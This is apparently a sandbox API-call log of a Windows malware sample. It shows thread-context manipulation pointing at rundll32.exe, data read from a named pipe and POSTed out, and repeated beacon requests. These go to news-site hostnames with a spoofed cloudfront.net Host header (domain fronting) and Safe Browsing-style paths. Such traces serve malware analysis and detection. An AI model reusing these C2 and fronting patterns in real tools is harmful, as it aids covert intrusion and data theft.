[0499.513] SetThreadContext (hThread=0x680, lpContext=0x2cf61c*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7f66a000, Edx=0x0, Ecx=0x0, Eax=0x1c0000, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x86, [129]=0x57, [130]=0x2e, [131]=0xf4, [132]=0xf4, [133]=0xf7, [134]=0x2c, [135]=0x0, [136]=0x78, [137]=0x5f, [138]=0x60, [139]=0x0, [140]=0x20, [141]=0xf8, [142]=0x2c, [143]=0x0, [144]=0x20, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x88, [149]=0xf9, [150]=0x2c, [151]=0x0, [152]=0x4, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x1, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x40, [161]=0xf9, [162]=0x2c, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x20, [169]=0xf8, [170]=0x2c, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x28, [269]=0xf9, [270]=0x2c, [271]=0x0, [272]=0x81, [273]=0x5b, [274]=0x60, [275]=0x0, [276]=0x20, [277]=0xf8, [278]=0x2c, [279]=0x0, [280]=0x20, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x40, [285]=0xf9, [286]=0x2c, [287]=0x0, [288]=0x88, [289]=0xf9, [290]=0x2c, [291]=0x0, [292]=0x4, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x1, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x8f, [305]=0x5b, [306]=0x60, [307]=0x0, [308]=0x88, [309]=0xf9, [310]=0x2c, [311]=0x0, [312]=0x43, [313]=0x3a, [314]=0x5c, [315]=0x57, [316]=0x69, [317]=0x6e, [318]=0x64, [319]=0x6f, [320]=0x77, [321]=0x73, [322]=0x5c, [323]=0x73, [324]=0x79, [325]=0x73, [326]=0x77, [327]=0x6f, [328]=0x77, [329]=0x36, [330]=0x34, [331]=0x5c, [332]=0x72, [333]=0x75, [334]=0x6e, [335]=0x64, [336]=0x6c, [337]=0x6c, [338]=0x33, [339]=0x32, [340]=0x2e, [341]=0x65, [342]=0x78, [343]=0x65, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x4c, [413]=0x8d, [414]=0x1f, [415]=0x77, [416]=0x8c, [417]=0x8f, [418]=0x1f, [419]=0x77, [420]=0xf6, [421]=0x53, [422]=0xfe, [423]=0x75, [424]=0x7c, [425]=0x99, [426]=0x1f, [427]=0x77, [428]=0xa, [429]=0x54, [430]=0xfe, [431]=0x75, [432]=0x4c, [433]=0x3, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x1c, [439]=0x0, [440]=0x0, [441]=0x7c, [442]=0x2, [443]=0x0, [444]=0xec, [445]=0x90, [446]=0x1f, [447]=0x77, [448]=0x5d, [449]=0x11, [450]=0x5, [451]=0x76, [452]=0x4c, [453]=0x3, [454]=0x0, [455]=0x0, [456]=0xd0, [457]=0xf8, [458]=0x2c, [459]=0x0, [460]=0xd4, [461]=0xf8, [462]=0x2c, [463]=0x0, [464]=0x20, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0xec, [469]=0xf8, [470]=0x2c, [471]=0x0, [472]=0x0, [473]=0x7c, [474]=0x2, [475]=0x0, [476]=0xf8, [477]=0xf8, [478]=0x2c, [479]=0x0, [480]=0xa8, [481]=0x58, [482]=0x60, [483]=0x0, [484]=0x4c, [485]=0x3, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x1c, [491]=0x0, [492]=0x0, [493]=0x80, [494]=0x2, [495]=0x0, [496]=0x20, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0xec, [501]=0xf8, [502]=0x2c, [503]=0x0, [504]=0x4c, [505]=0x3, [506]=0x0, [507]=0x0, [508]=0x88, [509]=0xf9, [510]=0x2c, [511]=0x0))) returned 1
[0499.515] ResumeThread (hThread=0x680) returned 0x1
[0499.580] CloseHandle (hObject=0x34c) returned 1
[0499.580] htonl (hostlong=0x28000000) returned 0x28
[0499.580] htonl (hostlong=0x32000000) returned 0x32
[0499.580] htonl (hostlong=0x0) returned 0x0
[0499.580] htons (hostshort=0x300) returned 0x3
[0499.581] htons (hostshort=0x983a) returned 0x3a98
[0499.581] htonl (hostlong=0x13000000) returned 0x13
[0499.581] htonl (hostlong=0xf000000) returned 0xf
[0499.581] CreateFileA (lpFileName="\\\\.\\pipe\\29a7ba79f8" (normalized: "\\device\\namedpipe\\29a7ba79f8"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff
[0499.581] GetLastError () returned 0x2
[0499.581] GetLastError () returned 0x2
[0499.581] Sleep (dwMilliseconds=0x1f4)
[0500.086] CreateFileA (lpFileName="\\\\.\\pipe\\29a7ba79f8" (normalized: "\\device\\namedpipe\\29a7ba79f8"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x34c
[0500.091] SetNamedPipeHandleState (hNamedPipe=0x34c, lpMode=0x2cf8c8, lpMaxCollectionCount=0x0, lpCollectDataTimeout=0x0) returned 1
[0500.091] GetTickCount () returned 0x8ccde
[0500.091] GetTickCount () returned 0x8ccde
[0500.091] PeekNamedPipe (in: hNamedPipe=0x34c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2cf8dc, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2cf8dc*=0x0, lpBytesLeftThisMessage=0x0) returned 1
[0500.091] Sleep (dwMilliseconds=0x1f4)
[0500.601] GetTickCount () returned 0x8cee2
[0500.602] PeekNamedPipe (in: hNamedPipe=0x34c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2cf8dc, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2cf8dc*=0x1b5d4, lpBytesLeftThisMessage=0x0) returned 1
[0500.602] PeekNamedPipe (in: hNamedPipe=0x34c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2cf9c4, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2cf9c4*=0x1b5d4, lpBytesLeftThisMessage=0x0) returned 1
[0500.603] ReadFile (in: hFile=0x34c, lpBuffer=0x2cf9a4, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x2cf9a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf9a4*, lpNumberOfBytesRead=0x2cf9a8*=0x4, lpOverlapped=0x0) returned 1
[0500.603] ReadFile (in: hFile=0x34c, lpBuffer=0x6b47020, nNumberOfBytesToRead=0x1b5d0, lpNumberOfBytesRead=0x2cf9a8, lpOverlapped=0x0 | out: lpBuffer=0x6b47020*, lpNumberOfBytesRead=0x2cf9a8*=0x1b5d0, lpOverlapped=0x0) returned 1
[0500.604] htonl (hostlong=0x2) returned 0x2000000
[0500.604] htonl (hostlong=0x0) returned 0x0
[0500.604] htonl (hostlong=0x3) returned 0x3000000
[0500.604] htonl (hostlong=0x4) returned 0x4000000
[0500.604] htonl (hostlong=0x1b5d4) returned 0xd4b50100
[0500.608] htonl (hostlong=0x1b5f0) returned 0xf0b50100
[0500.610] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x25, wSecond=0x4, wMilliseconds=0x3a1))
[0500.610] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0500.610] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0500.610] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0500.610] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9d0, dwBufferLength=0x4) returned 1
[0500.610] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9d0, dwBufferLength=0x4) returned 1
[0500.610] InternetConnectA (hInternet=0xcc0004, lpszServerName="www.reutersmedia.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0500.616] GetLastError () returned 0x0
[0500.616] SetLastError (dwErrCode=0x0)
[0500.616] GetLastError () returned 0x0
[0500.616] SetLastError (dwErrCode=0x0)
[0500.616] htonl (hostlong=0xa000000) returned 0xa
[0500.616] htonl (hostlong=0x22000000) returned 0x22
[0500.616] GetLastError () returned 0x0
[0500.616] SetLastError (dwErrCode=0x0)
[0500.616] htonl (hostlong=0xa000000) returned 0xa
[0500.616] htonl (hostlong=0x47000000) returned 0x47
[0500.616] GetLastError () returned 0x0
[0500.616] SetLastError (dwErrCode=0x0)
[0500.616] htonl (hostlong=0xa000000) returned 0xa
[0500.616] htonl (hostlong=0x1f000000) returned 0x1f
[0500.616] GetLastError () returned 0x0
[0500.616] SetLastError (dwErrCode=0x0)
[0500.616] htonl (hostlong=0x7000000) returned 0x7
[0500.616] htonl (hostlong=0x0) returned 0x0
[0500.616] htonl (hostlong=0x8000000) returned 0x8
[0500.616] htonl (hostlong=0x2000000) returned 0x2
[0500.616] htonl (hostlong=0x12000000) returned 0x12
[0500.616] htonl (hostlong=0x2000000) returned 0x2
[0500.616] htonl (hostlong=0x8000000) returned 0x8
[0500.616] htonl (hostlong=0x6000000) returned 0x6
[0500.616] htonl (hostlong=0x6000000) returned 0x6
[0500.616] GetLastError () returned 0x0
[0500.616] SetLastError (dwErrCode=0x0)
[0500.616] htonl (hostlong=0x7000000) returned 0x7
[0500.616] htonl (hostlong=0x1000000) returned 0x1
[0500.616] htonl (hostlong=0x4000000) returned 0x4
[0500.616] htonl (hostlong=0x0) returned 0x0
[0500.616] GetLastError () returned 0x0
[0500.616] SetLastError (dwErrCode=0x0)
[0500.616] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/safebrowsing/rd/g349f3qf45t5g-k32", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce938*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0500.616] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce918, lpdwBufferLength=0x2ce914 | out: lpBuffer=0x2ce918, lpdwBufferLength=0x2ce914) returned 1
[0500.616] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce918, dwBufferLength=0x4) returned 1
[0500.616] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=U=779b64e1a7ed737adededjdbdh\r\n", dwHeadersLength=0xbc, lpOptional=0x6a40048*, dwOptionalLength=0x1b5f4 | out: lpOptional=0x6a40048*) returned 1
[0507.132] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0507.134] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0507.134] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0507.134] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x25, wSecond=0xb, wMilliseconds=0x1c8))
[0507.134] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x384018) returned 1
[0507.135] CryptGenRandom (in: hProv=0x384018, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0507.135] CryptReleaseContext (hProv=0x384018, dwFlags=0x0) returned 1
[0507.135] Sleep (dwMilliseconds=0x3680)
[0517.140] GetLastError () returned 0x0
[0517.140] SetLastError (dwErrCode=0x0)
[0517.140] GetLastError () returned 0x0
[0517.140] SetLastError (dwErrCode=0x0)
[0517.140] GetLastError () returned 0x0
[0517.140] SetLastError (dwErrCode=0x0)
[0517.140] GetLastError () returned 0x0
[0517.140] SetLastError (dwErrCode=0x0)
[0517.140] GetLastError () returned 0x0
[0517.140] SetLastError (dwErrCode=0x0)
[0517.140] GetLastError () returned 0x0
[0517.140] SetLastError (dwErrCode=0x0)
[0517.140] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0517.140] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0517.140] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0517.140] InternetConnectA (hInternet=0xcc0004, lpszServerName="maptile.usnews.com", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0517.140] GetLastError () returned 0x0
[0517.141] SetLastError (dwErrCode=0x0)
[0517.141] htonl (hostlong=0xa000000) returned 0xa
[0517.141] htonl (hostlong=0x22000000) returned 0x22
[0517.141] GetLastError () returned 0x0
[0517.141] SetLastError (dwErrCode=0x0)
[0517.141] htonl (hostlong=0xa000000) returned 0xa
[0517.141] htonl (hostlong=0x47000000) returned 0x47
[0517.141] GetLastError () returned 0x0
[0517.141] SetLastError (dwErrCode=0x0)
[0517.141] htonl (hostlong=0xa000000) returned 0xa
[0517.141] htonl (hostlong=0x1f000000) returned 0x1f
[0517.141] GetLastError () returned 0x0
[0517.141] SetLastError (dwErrCode=0x0)
[0517.141] htonl (hostlong=0x7000000) returned 0x7
[0517.141] htonl (hostlong=0x0) returned 0x0
[0517.141] htonl (hostlong=0x8000000) returned 0x8
[0517.141] htonl (hostlong=0x2000000) returned 0x2
[0517.141] htonl (hostlong=0x8000000) returned 0x8
[0517.141] htonl (hostlong=0x6000000) returned 0x6
[0517.141] htonl (hostlong=0x6000000) returned 0x6
[0517.141] GetLastError () returned 0x0
[0517.141] SetLastError (dwErrCode=0x0)
[0517.141] htonl (hostlong=0x0) returned 0x0
[0517.141] GetLastError () returned 0x0
[0517.141] SetLastError (dwErrCode=0x0)
[0517.141] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0517.141] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0517.141] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0517.141] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0517.808] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0517.808] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0517.808] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0517.809] PeekNamedPipe (in: hNamedPipe=0x34c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2cf9c4, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2cf9c4, lpBytesLeftThisMessage=0x0) returned 0
[0517.810] DisconnectNamedPipe (hNamedPipe=0x34c) returned 0
[0517.810] CloseHandle (hObject=0x34c) returned 1
[0517.810] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x25, wSecond=0x16, wMilliseconds=0x7d))
[0517.810] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0517.810] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0517.810] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x25, wSecond=0x16, wMilliseconds=0x7d))
[0517.810] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x383710) returned 1
[0517.811] CryptGenRandom (in: hProv=0x383710, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0517.811] CryptReleaseContext (hProv=0x383710, dwFlags=0x0) returned 1
[0517.811] Sleep (dwMilliseconds=0x3000)
[0527.816] GetLastError () returned 0x0
[0527.816] SetLastError (dwErrCode=0x0)
[0527.816] GetLastError () returned 0x0
[0527.816] SetLastError (dwErrCode=0x0)
[0527.816] GetLastError () returned 0x0
[0527.816] SetLastError (dwErrCode=0x0)
[0527.816] GetLastError () returned 0x0
[0527.816] SetLastError (dwErrCode=0x0)
[0527.816] GetLastError () returned 0x0
[0527.816] SetLastError (dwErrCode=0x0)
[0527.816] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0527.816] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0527.816] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0527.816] InternetConnectA (hInternet=0xcc0004, lpszServerName="asset.wsj.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0527.816] GetLastError () returned 0x0
[0527.816] SetLastError (dwErrCode=0x0)
[0527.816] htonl (hostlong=0xa000000) returned 0xa
[0527.816] htonl (hostlong=0x22000000) returned 0x22
[0527.816] GetLastError () returned 0x0
[0527.816] SetLastError (dwErrCode=0x0)
[0527.816] htonl (hostlong=0xa000000) returned 0xa
[0527.816] htonl (hostlong=0x47000000) returned 0x47
[0527.816] GetLastError () returned 0x0
[0527.816] SetLastError (dwErrCode=0x0)
[0527.816] htonl (hostlong=0xa000000) returned 0xa
[0527.816] htonl (hostlong=0x1f000000) returned 0x1f
[0527.816] GetLastError () returned 0x0
[0527.816] SetLastError (dwErrCode=0x0)
[0527.816] htonl (hostlong=0x7000000) returned 0x7
[0527.816] htonl (hostlong=0x0) returned 0x0
[0527.816] htonl (hostlong=0x8000000) returned 0x8
[0527.816] htonl (hostlong=0x2000000) returned 0x2
[0527.816] htonl (hostlong=0x8000000) returned 0x8
[0527.816] htonl (hostlong=0x6000000) returned 0x6
[0527.816] htonl (hostlong=0x6000000) returned 0x6
[0527.816] GetLastError () returned 0x0
[0527.816] SetLastError (dwErrCode=0x0)
[0527.816] htonl (hostlong=0x0) returned 0x0
[0527.816] GetLastError () returned 0x0
[0527.816] SetLastError (dwErrCode=0x0)
[0527.816] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0527.816] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0527.816] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0527.816] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0528.504] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0528.504] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0528.504] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0528.504] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x25, wSecond=0x20, wMilliseconds=0x33f))
